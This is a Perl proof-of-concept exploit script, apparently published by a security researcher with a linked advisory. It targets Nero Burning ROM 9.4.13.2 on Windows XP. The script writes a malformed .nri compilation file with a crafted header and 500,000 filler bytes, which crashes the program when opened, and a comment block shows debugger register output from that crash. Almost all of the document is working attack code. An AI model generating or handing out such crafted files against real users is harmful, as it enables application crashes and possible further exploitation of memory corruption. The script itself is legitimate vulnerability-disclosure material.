83 lines
No EOL
2.7 KiB
Perl
Executable file
83 lines
No EOL
2.7 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
#
|
|
# Title: Nero Burning ROM 9 (iso compilation) Local Buffer Invasion Proof Of Concept
|
|
#
|
|
#
|
|
# Product web page: http://www.nero.com
|
|
# Version tested: 9.4.13.2
|
|
# OS platform used: Microsoft Windows XP Professional SP3 (English)
|
|
#
|
|
# Registers pick'a'chu:
|
|
# ------------------------------------------------------------------------
|
|
#
|
|
# (adc.b30): Access violation - code c0000005 (first chance)
|
|
# First chance exceptions are reported before any exception handling.
|
|
# This exception may be expected and handled.
|
|
# eax=41414141 ebx=00000000 ecx=0012ecf0 edx=00000000 esi=04c8acc8 edi=00e29890
|
|
# eip=0057f53c esp=0012ec38 ebp=0012ed28 iopl=0 nv up ei pl nz na pe nc
|
|
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
|
# Nero+0x17f53c:
|
|
# 0057f53c 394204 cmp dword ptr [edx+4],eax ds:0023:00000004=????????
|
|
#
|
|
# ------------------------------------------------------------------------
|
|
#
|
|
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
|
|
#
|
|
# liquidworm gmail com
|
|
#
|
|
# Zero Science Lab - http://www.zeroscience.org
|
|
#
|
|
# 30.09.2009
|
|
#
|
|
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4927.php
|
|
#
|
|
|
|
|
|
|
|
## ##
|
|
# # # #
|
|
# # # #
|
|
#O # # O#
|
|
#[*] # # [*]#
|
|
####
|
|
$id="\xFF\xFE".
|
|
"\xFF\x0E\x4E\x00".
|
|
"\x65\x00\x72\x00\x6F".
|
|
"\x00\x49\x00\x53\x00\x4F".
|
|
#####===###_O----O_###===#####
|
|
"\x00\x30\x00\x2E\x00\x30\x00".
|
|
"\x33\x00\x2E\x00\x30\x00\x31".
|
|
"\x00\x0B\x00\x00\x00\x01".
|
|
"\x00\x00\x00\x00\x00".
|
|
"\x10\x4E".
|
|
"\x45".
|
|
"\x52".
|
|
"\x4F".
|
|
"\x20\x42\x55\x52\x4E\x49".
|
|
"\x4E". "\x47\x20". "\x52".
|
|
"\x4F". "\x4D\x00\x00". "\x00".
|
|
"\x9C". "\x20\xBC\x4A\x9C". "\x20".
|
|
"\xBC". "\x4A\xFF\xFF". "\xFF".
|
|
"\xFF". "\xFF\xFF\xFF". "\xFF".
|
|
"\x00". "\x00\x00". "\x00".
|
|
"\x9F". "\x20". "\xBC". "\x4A".
|
|
"\x01". "\x00". "\x00"."\x00".
|
|
"\x00". "\x00". "\x00"."\x00".
|
|
"\x01"."\x00\x00". "\x00\x01"."\x00".
|
|
"\x00". "\x00".
|
|
"\x01". "\x00".
|
|
"\x00". "\x00".
|
|
"\x00". "\x00".
|
|
"\x00". "\x00";
|
|
###############################################
|
|
###############################################
|
|
|
|
|
|
|
|
$fl="Neeero.nri";$op="\x41" x 500000;
|
|
open nri, ">./$fl" || die "\nCan't open $fl: $!";
|
|
print nri $id.$op;
|
|
print "\n ~ Invasion started...\n";
|
|
sleep 1;close nri;
|
|
print "\n ~ File $fl invaded host.\n"; |